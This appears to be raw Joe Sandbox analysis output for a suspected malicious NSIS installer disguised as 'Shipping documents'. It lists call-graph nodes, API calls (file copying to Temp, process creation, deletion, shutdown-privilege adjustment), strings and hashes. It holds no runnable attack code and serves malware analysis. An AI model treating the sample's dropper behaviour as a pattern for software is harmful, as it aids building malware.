40386e 3773->3776 3776->3764 3776->3817 3783 4038a9 3778->3783 3780 403ab3 3784 403b37 ExitProcess 3780->3784 3785 403abb GetCurrentProcess OpenProcessToken 3780->3785 3781 403a8f 3782 405bb7 MessageBoxIndirectW 3781->3782 3789 403a9d ExitProcess 3782->3789 3786 403907 3783->3786 3787 40394a 3783->3787 3790 403ad3 LookupPrivilegeValueW AdjustTokenPrivileges 3785->3790 3791 403b07 3785->3791 3793 405f2e 18 API calls 3786->3793 3794 405b22 5 API calls 3787->3794 3790->3791 3792 40694b 5 API calls 3791->3792 3796 403b0e 3792->3796 3797 403913 3793->3797 3795 40394f lstrlenW 3794->3795 3925 406557 lstrcpynW 3795->3925 3799 403b23 ExitWindowsEx 3796->3799 3801 403b30 3796->3801 3797->3817 3923 406557 lstrcpynW 3797->3923 3799->3784 3799->3801 3800 403969 3803 403981 3800->3803 3926 406557 lstrcpynW 3800->3926 3934 40140b 3801->3934 3808 4039a7 wsprintfW 3803->3808 3823 4039d3 3803->3823 3805 403926 3924 406557 lstrcpynW 3805->3924 3810 406594 21 API calls 3808->3810 3866 403c29 3809->3866 3810->3803 3811 405aab 2 API calls 3811->3823 3812 405b05 2 API calls 3812->3823 3813 4039e3 GetFileAttributesW 3815 4039ef DeleteFileW 3813->3815 3813->3823 3814 403a1d SetCurrentDirectoryW 3816 406317 40 API calls 3814->3816 3815->3823 3818 403a2c CopyFileW 3816->3818 3927 403b4f 3817->3927 3818->3817 3818->3823 3819 405c63 71 API calls 3819->3823 3820 406317 40 API calls 3820->3823 3821 406594 21 API calls 3821->3823 3822 405b3a 2 API calls 3822->3823 3823->3803 3823->3808 3823->3811 3823->3812 3823->3813 3823->3814 3823->3817 3823->3819 3823->3820 3823->3821 3823->3822 3824 403aa5 CloseHandle 3823->3824 3825 4068b4 2 API calls 3823->3825 3824->3817 3825->3823 3826->3754 3827->3756 3829 406805 5 API calls 3828->3829 3830 40350d 3829->3830 3831 403517 3830->3831 3832 405e26 3 API calls 3830->3832 3831->3762 3833 40351f 3832->3833 3834 405b05 2 API calls 3833->3834 3835 403525 3834->3835 3836 406076 2 API calls 3835->3836 3837 403530 3836->3837 3837->3762 3937 406047 
GetFileAttributesW CreateFileW 3838->3937 3840 4030c2 3861 4030d2 3840->3861 3938 406557 lstrcpynW 3840->3938 3842 4030e8 3843 405e72 2 API calls 3842->3843 3844 4030ee 3843->3844 3939 406557 lstrcpynW 3844->3939 3846 4030f9 GetFileSize 3847 4031f3 3846->3847 3859 403110 3846->3859 3940 40301e 3847->3940 3849 4031fc 3851 40322c GlobalAlloc 3849->3851 3849->3861 3952 4034ea SetFilePointer 3849->3952 3850 4034d4 ReadFile 3850->3859 3951 4034ea SetFilePointer 3851->3951 3853 40325f 3857 40301e 6 API calls 3853->3857 3855 403215 3858 4034d4 ReadFile 3855->3858 3856 403247 3860 4032b9 35 API calls 3856->3860 3857->3861 3862 403220 3858->3862 3859->3847 3859->3850 3859->3853 3859->3861 3863 40301e 6 API calls 3859->3863 3864 403253 3860->3864 3861->3770 3862->3851 3862->3861 3863->3859 3864->3861 3864->3864 3865 403290 SetFilePointer 3864->3865 3865->3861 3867 40694b 5 API calls 3866->3867 3868 403c3d 3867->3868 3869 403c43 3868->3869 3870 403c55 3868->3870 3968 40649e wsprintfW 3869->3968 3871 406425 3 API calls 3870->3871 3872 403c85 3871->3872 3874 403ca4 lstrcatW 3872->3874 3876 406425 3 API calls 3872->3876 3875 403c53 3874->3875 3953 403eff 3875->3953 3876->3874 3879 405f2e 18 API calls 3880 403cd6 3879->3880 3881 403d6a 3880->3881 3883 406425 3 API calls 3880->3883 3882 405f2e 18 API calls 3881->3882 3884 403d70 3882->3884 3885 403d08 3883->3885 3886 403d80 LoadImageW 3884->3886 3887 406594 21 API calls 3884->3887 3885->3881 3890 403d29 lstrlenW 3885->3890 3894 405e53 CharNextW 3885->3894 3888 403e26 3886->3888 3889 403da7 RegisterClassW 3886->3889 3887->3886 3893 40140b 2 API calls 3888->3893 3891 403e30 3889->3891 3892 403ddd SystemParametersInfoW CreateWindowExW 3889->3892 3895 403d37 lstrcmpiW 3890->3895 3896 403d5d 3890->3896 3891->3817 3892->3888 3897 403e2c 3893->3897 3898 403d26 3894->3898 3895->3896 3899 403d47 GetFileAttributesW 3895->3899 3900 405e26 3 API calls 3896->3900 3897->3891 3902 403eff 22 API calls 3897->3902 3898->3890 3901 403d53 3899->3901 
3903 403d63 3900->3903 3901->3896 3905 405e72 2 API calls 3901->3905 3906 403e3d 3902->3906 3969 406557 lstrcpynW 3903->3969 3905->3896 3907 403e49 ShowWindow 3906->3907 3908 403ecc 3906->3908 3909 4068db 3 API calls 3907->3909 3961 4056af OleInitialize 3908->3961 3911 403e61 3909->3911 3913 403e6f GetClassInfoW 3911->3913 3916 4068db 3 API calls 3911->3916 3912 403ed2 3914 403ed6 3912->3914 3915 403eee 3912->3915 3918 403e83 GetClassInfoW RegisterClassW 3913->3918 3919 403e99 DialogBoxParamW 3913->3919 3914->3891 3920 40140b 2 API calls 3914->3920 3917 40140b 2 API calls 3915->3917 3916->3913 3917->3891 3918->3919 3921 40140b 2 API calls 3919->3921 3920->3891 3921->3891 3922->3760 3923->3805 3924->3809 3925->3800 3926->3803 3928 403b67 3927->3928 3929 403b59 CloseHandle 3927->3929 3981 403b94 3928->3981 3929->3928 3932 405c63 71 API calls 3933 403a82 OleUninitialize 3932->3933 3933->3780 3933->3781 3935 401389 2 API calls 3934->3935 3936 401420 3935->3936 3936->3784 3937->3840 3938->3842 3939->3846 3941 403027 3940->3941 3942 40303f 3940->3942 3943 403030 DestroyWindow 3941->3943 3944 403037 3941->3944 3945 403047 3942->3945 3946 40304f GetTickCount 3942->3946 3943->3944 3944->3849 3949 406987 2 API calls 3945->3949 3947 403080 3946->3947 3948 40305d CreateDialogParamW ShowWindow 3946->3948 3947->3849 3948->3947 3950 40304d 3949->3950 3950->3849 3951->3856 3952->3855 3954 403f13 3953->3954 3970 40649e wsprintfW 3954->3970 3956 403f84 3971 403fb8 3956->3971 3958 403cb4 3958->3879 3959 403f89 3959->3958 3960 406594 21 API calls 3959->3960 3960->3959 3974 404522 3961->3974 3963 4056d2 3967 4056f9 3963->3967 3977 401389 3963->3977 3964 404522 SendMessageW 3965 40570b OleUninitialize 3964->3965 3965->3912 3967->3964 3968->3875 3969->3881 3970->3956 3972 406594 21 API calls 3971->3972 3973 403fc6 SetWindowTextW 3972->3973 3973->3959 3975 40453a 3974->3975 3976 40452b SendMessageW 3974->3976 3975->3963 3976->3975 3979 401390 3977->3979 3978 4013fe 3978->3963 3979->3978 
3980 4013cb MulDiv SendMessageW 3979->3980 3980->3979 3982 403ba2 3981->3982 3983 403ba7 FreeLibrary GlobalFree 3982->3983 3984 403b6c 3982->3984 3983->3983 3983->3984 3984->3932 4817 401a35 4818 402dab 21 API calls 4817->4818 4819 401a3e ExpandEnvironmentStringsW 4818->4819 4820 401a52 4819->4820 4822 401a65 4819->4822 4821 401a57 lstrcmpW 4820->4821 4820->4822 4821->4822 4828 4023b7 4829 4023c5 4828->4829 4830 4023bf 4828->4830 4832 4023d3 4829->4832 4833 402dab 21 API calls 4829->4833 4831 402dab 21 API calls 4830->4831 4831->4829 4834 402dab 21 API calls 4832->4834 4836 4023e1 4832->4836 4833->4832 4834->4836 4835 402dab 21 API calls 4837 4023ea WritePrivateProfileStringW 4835->4837 4836->4835 4838 4014b8 4839 4014be 4838->4839 4840 401389 2 API calls 4839->4840 4841 4014c6 4840->4841 4122 402439 4123 402441 4122->4123 4124 40246c 4122->4124 4126 402deb 21 API calls 4123->4126 4125 402dab 21 API calls 4124->4125 4127 402473 4125->4127 4128 402448 4126->4128 4134 402e69 4127->4134 4130 402452 4128->4130 4133 402480 4128->4133 4131 402dab 21 API calls 4130->4131 4132 402459 RegDeleteValueW RegCloseKey 4131->4132 4132->4133 4135 402e76 4134->4135 4136 402e7d 4134->4136 4135->4133 4136->4135 4138 402eae 4136->4138 4139 4063c4 RegOpenKeyExW 4138->4139 4140 402edc 4139->4140 4141 402f91 4140->4141 4142 402ee6 4140->4142 4141->4135 4143 402eec RegEnumValueW 4142->4143 4152 402f0f 4142->4152 4144 402f76 RegCloseKey 4143->4144 4143->4152 4144->4141 4145 402f4b RegEnumKeyW 4146 402f54 RegCloseKey 4145->4146 4145->4152 4147 40694b 5 API calls 4146->4147 4148 402f64 4147->4148 4150 402f86 4148->4150 4151 402f68 RegDeleteKeyW 4148->4151 4149 402eae 6 API calls 4149->4152 4150->4141 4151->4141 4152->4144 4152->4145 4152->4146 4152->4149 4153 40173a 4154 402dab 21 API calls 4153->4154 4155 401741 SearchPathW 4154->4155 4156 40175c 4155->4156 4842 401d3d 4843 402d89 21 API calls 4842->4843 4844 401d44 4843->4844 4845 402d89 21 API calls 4844->4845 4846 401d50 GetDlgItem 
4845->4846 4847 40263d 4846->4847

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 6FE81987: GetCurrentProcess.KERNEL32(?,?,00000000,?,?,?,6FE810E0), ref: 6FE81990
                                          • Part of subcall function 6FE81987: GetModuleHandleA.KERNEL32(KERNEL32,?,?,00000000,?,?,?,6FE810E0), ref: 6FE8199E
                                          • Part of subcall function 6FE81987: GetProcAddress.KERNEL32(00000000,?), ref: 6FE819BD
                                        • GetModuleFileNameW.KERNEL32(?,00000104), ref: 6FE810FA
                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 6FE81112
                                        • CharPrevW.USER32(?,?), ref: 6FE8113D
                                        • GlobalFree.KERNEL32(00000000), ref: 6FE81164
                                        • GetTempFileNameW.KERNEL32(?,6FE83088,00000000,?), ref: 6FE81182
                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 6FE81198
                                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 6FE811B0
                                        • CreateFileMappingW.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 6FE811BF
                                        • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 6FE811CD
                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 6FE811F7
                                        • CloseHandle.KERNEL32(00000000), ref: 6FE811FE
                                        • CloseHandle.KERNEL32(00000000), ref: 6FE81205
                                        • lstrcatW.KERNEL32(?,6FE83084), ref: 6FE81214
                                        • lstrlenW.KERNEL32(?), ref: 6FE8121B
                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 6FE8123C
                                        • FindWindowExW.USER32(000103E6,00000000,#32770,00000000), ref: 6FE81274
                                        • FindWindowExW.USER32(00000000), ref: 6FE81277
                                        • lstrcmpiW.KERNEL32(00000000,/OEM,00000000), ref: 6FE812B0
                                        • lstrcmpiW.KERNEL32(00000000,/MBCS), ref: 6FE812C5
                                        • DeleteFileW.KERNEL32(?,error), ref: 6FE812FA
                                        • GetVersion.KERNEL32 ref: 6FE81340
                                        • GlobalAlloc.KERNEL32(00000040,00000FFE), ref: 6FE813B0
                                        • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 6FE813DE
                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 6FE813EF
                                        • CreatePipe.KERNELBASE(?,?,0000000C,00000000), ref: 6FE81411
                                        • CreatePipe.KERNELBASE(?,?,0000000C,00000000), ref: 6FE81424
                                        • GetStartupInfoW.KERNEL32(00000044), ref: 6FE81431
                                        • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,?), ref: 6FE8147A
                                        • lstrcpyW.KERNEL32(?,error), ref: 6FE81490
                                        • GetTickCount.KERNEL32 ref: 6FE8149B
                                        • WaitForSingleObject.KERNEL32(?,00000000), ref: 6FE814AB
                                        • GetExitCodeProcess.KERNELBASE(?,?), ref: 6FE814BE
                                        • PeekNamedPipe.KERNELBASE(?,00000000,00000000,00000000,?,00000000), ref: 6FE814CF
                                        • GetTickCount.KERNEL32 ref: 6FE814DE
                                        • ReadFile.KERNEL32(?,00000000,00000400,?,00000000), ref: 6FE81503
                                        • IsTextUnicode.ADVAPI32(6FE830B8,?,00000000), ref: 6FE81529
                                        • IsDBCSLeadByteEx.KERNEL32(?,?), ref: 6FE8159D
                                        • MultiByteToWideChar.KERNEL32(?,00000000,6FE830B8,00000001,?,00000002), ref: 6FE815C4
                                        • lstrcpyW.KERNEL32(?, ), ref: 6FE815F4
                                        • GlobalReAlloc.KERNEL32(00000002,00000402,00000042), ref: 6FE81686
                                          • Part of subcall function 6FE81948: CharNextExA.USER32(?,0000000A,00000000,6FE830B8,?,6FE816EA,?,00000002,00000002,0000000A), ref: 6FE81974
                                        • lstrcpyW.KERNEL32(?,error), ref: 6FE816F8
                                        • GetTickCount.KERNEL32 ref: 6FE81716
                                        • TerminateProcess.KERNEL32(?,000000FF), ref: 6FE8172D
                                        • lstrcpyW.KERNEL32(?,timeout), ref: 6FE8173F
                                        • Sleep.KERNELBASE(00000064), ref: 6FE8174C
                                        • lstrcpyW.KERNEL32(?,error), ref: 6FE8179C
                                        • wsprintfW.USER32 ref: 6FE817BA
                                        • CloseHandle.KERNEL32(?,?), ref: 6FE817D8
                                        • CloseHandle.KERNEL32(?), ref: 6FE817E0
                                        • CloseHandle.KERNEL32(?), ref: 6FE817E5
                                        • CloseHandle.KERNEL32(?), ref: 6FE817EA
                                        • CloseHandle.KERNEL32(?), ref: 6FE817EF
                                        • CloseHandle.KERNEL32(?), ref: 6FE817F4
                                        • DeleteFileW.KERNEL32(?), ref: 6FE8180A
                                        • GlobalFree.KERNEL32(?), ref: 6FE81819
                                        • GlobalFree.KERNEL32(00000002), ref: 6FE81823
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2153670485.000000006FE81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FE80000, based on PE: true
                                        • Associated: 00000000.00000002.2153651950.000000006FE80000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000000.00000002.2153686664.000000006FE82000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000000.00000002.2153704607.000000006FE83000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000000.00000002.2153723885.000000006FE84000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fe80000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: File$Handle$Close$Global$Createlstrcpy$AllocProcess$CharCountFreePipeTick$ByteDeleteDescriptorFindModuleNameSecurityViewWindowlstrcmpi$AddressCodeCopyCurrentDaclExitInfoInitializeLeadMappingMultiNamedNextObjectPeekPrevProcReadSingleSleepStartupTempTerminateTextUnicodeUnmapVersionWaitWidelstrcatlstrlenwsprintf
                                        • String ID: $#32770$/MBCS$/OEM$/TIMEOUT=$@1#v7#v$D$SysListView32$error$timeout
                                        • API String ID: 351676774-3132266245
                                        • Opcode ID: a38aa098b078caa8aa6c23147e333e181a63814e3907cceebc7e4e8fa082e320
                                        • Instruction ID: 95267072ebd86fe360c834f1347fa03b8c3bb0d94588a80c7e4ef3d735d01618
                                        • Opcode Fuzzy Hash: a38aa098b078caa8aa6c23147e333e181a63814e3907cceebc7e4e8fa082e320
                                        • Instruction Fuzzy Hash: 7E321571800219EFDF11AFE4C984ADEBFBAFF0A354F20416AE529A7250D7349A85CF50

                                        Control-flow Graph

                                        APIs
                                        • SetErrorMode.KERNELBASE ref: 00403555
                                        • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00403580
                                        • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00403593
                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040362C
                                        • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403669
                                        • OleInitialize.OLE32(00000000), ref: 00403670
                                        • SHGetFileInfoW.SHELL32(0042AA28,00000000,?,000002B4,00000000), ref: 0040368F
                                        • GetCommandLineW.KERNEL32(00433700,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004036A4
                                        • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe",00000020,"C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe",00000000,?,00000008,0000000A,0000000C), ref: 004036DD
                                        • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403815
                                        • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403826
                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403832
                                        • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403846
                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040384E
                                        • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040385F
                                        • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403867
                                        • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040387B
                                        • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403954
                                          • Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564
                                        • wsprintfW.USER32 ref: 004039B1
                                        • GetFileAttributesW.KERNEL32(00437800,C:\Users\user\AppData\Local\Temp\), ref: 004039E4
                                        • DeleteFileW.KERNEL32(00437800), ref: 004039F0
                                        • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403A1E
                                          • Part of subcall function 00406317: MoveFileExW.KERNEL32(?,?,00000005,00405E15,?,00000000,000000F1,?,?,?,?,?), ref: 00406321
                                        • CopyFileW.KERNEL32(C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe,00437800,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403A34
                                          • Part of subcall function 00405B3A: CreateProcessW.KERNELBASE(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B63
                                          • Part of subcall function 00405B3A: CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B70
                                          • Part of subcall function 004068B4: FindFirstFileW.KERNELBASE(?,0042FAB8,C:\Users\user\AppData\Local\Temp\nsi1309.tmp,00405F77,C:\Users\user\AppData\Local\Temp\nsi1309.tmp,C:\Users\user\AppData\Local\Temp\nsi1309.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsi1309.tmp,C:\Users\user\AppData\Local\Temp\nsi1309.tmp, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76233420,C:\Users\user\AppData\Local\Temp\), ref: 004068BF
                                          • Part of subcall function 004068B4: FindClose.KERNEL32(00000000), ref: 004068CB
                                        • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A82
                                        • ExitProcess.KERNEL32 ref: 00403A9F
                                        • CloseHandle.KERNEL32(00000000,00438000,00438000,?,00437800,00000000), ref: 00403AA6
                                        • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AC2
                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AC9
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403ADE
                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403B01
                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 00403B26
                                        • ExitProcess.KERNEL32 ref: 00403B49
                                          • Part of subcall function 00405B05: CreateDirectoryW.KERNELBASE(?,00000000,00403525,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405B0B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                        • String ID: "C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\acneform$C:\Users\user\AppData\Local\acneform\Baroco$C:\Users\user\Desktop$C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                        • API String ID: 1813718867-519494932
                                        • Opcode ID: 2f58fbcc075b23529aa9588561da4342b8d2734b046618fffc698aa71994b29c
                                        • Instruction ID: 6c1349364f4d22fadfcc29bbd5f82b0434b4f5ba6e08f6571c64e8404a3f48da
                                        • Opcode Fuzzy Hash: 2f58fbcc075b23529aa9588561da4342b8d2734b046618fffc698aa71994b29c
                                        • Instruction Fuzzy Hash: 64F10270604301ABD320AF659D45B2B7AE8EF8570AF10483EF581B22D1DB7DDA45CB6E

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                         [control-flow graph of the function at 0040571B: rendered graph omitted]
                                        APIs
                                        • GetDlgItem.USER32(?,00000403), ref: 00405779
                                        • GetDlgItem.USER32(?,000003EE), ref: 00405788
                                        • GetClientRect.USER32(?,?), ref: 004057C5
                                        • GetSystemMetrics.USER32(00000002), ref: 004057CC
                                        • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057ED
                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057FE
                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405811
                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040581F
                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405832
                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405854
                                        • ShowWindow.USER32(?,00000008), ref: 00405868
                                        • GetDlgItem.USER32(?,000003EC), ref: 00405889
                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405899
                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004058B2
                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058BE
                                        • GetDlgItem.USER32(?,000003F8), ref: 00405797
                                          • Part of subcall function 0040450B: SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519
                                        • GetDlgItem.USER32(?,000003EC), ref: 004058DB
                                        • CreateThread.KERNELBASE(00000000,00000000,Function_000056AF,00000000), ref: 004058E9
                                        • CloseHandle.KERNELBASE(00000000), ref: 004058F0
                                        • ShowWindow.USER32(00000000), ref: 00405914
                                        • ShowWindow.USER32(?,00000008), ref: 00405919
                                        • ShowWindow.USER32(00000008), ref: 00405963
                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405997
                                        • CreatePopupMenu.USER32 ref: 004059A8
                                        • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004059BC
                                        • GetWindowRect.USER32(?,?), ref: 004059DC
                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059F5
                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A2D
                                        • OpenClipboard.USER32(00000000), ref: 00405A3D
                                        • EmptyClipboard.USER32 ref: 00405A43
                                        • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A4F
                                        • GlobalLock.KERNEL32(00000000), ref: 00405A59
                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A6D
                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405A8D
                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00405A98
                                        • CloseClipboard.USER32 ref: 00405A9E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                        • String ID: {
                                        • API String ID: 590372296-366298937
                                        • Opcode ID: 6ac74cf2b0cd8326ebbb69d62323ae371d5bd3f712404c75dedbcee8fb33a3cc
                                        • Instruction ID: 234ab3d0ec1f6487b719ed7b99e1d6b4405f443d9e8d78e252fa94ab3ac4d3a1
                                        • Opcode Fuzzy Hash: 6ac74cf2b0cd8326ebbb69d62323ae371d5bd3f712404c75dedbcee8fb33a3cc
                                        • Instruction Fuzzy Hash: 34B139B1900608FFDB11AF60DD89AAE7B79FB48355F00813AFA41BA1A0C7785A51DF58

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                         [control-flow graph of the function at 00405C63: rendered graph omitted]
                                        APIs
                                        • DeleteFileW.KERNELBASE(?,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe"), ref: 00405C8C
                                        • lstrcatW.KERNEL32(0042EA70,\*.*,0042EA70,?,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe"), ref: 00405CD4
                                        • lstrcatW.KERNEL32(?,0040A014,?,0042EA70,?,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe"), ref: 00405CF7
                                        • lstrlenW.KERNEL32(?,?,0040A014,?,0042EA70,?,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe"), ref: 00405CFD
                                        • FindFirstFileW.KERNEL32(0042EA70,?,?,?,0040A014,?,0042EA70,?,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe"), ref: 00405D0D
                                        • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405DAD
                                        • FindClose.KERNEL32(00000000), ref: 00405DBC
                                        Strings
                                        • "C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe", xrefs: 00405C6C
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C70
                                        • pB, xrefs: 00405CBC
                                        • \*.*, xrefs: 00405CCE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                        • String ID: "C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe"$C:\Users\user\AppData\Local\Temp\$\*.*$pB
                                        • API String ID: 2035342205-4118179798
                                        • Opcode ID: 8ddda18a5e03c3094d99475b595a137c5d28125fbada97bd0876376ed00bff5b
                                        • Instruction ID: 3df5019795aaf58f6817f8e3609a5bcb0d9fa216103f8ca083ea3247371bac5c
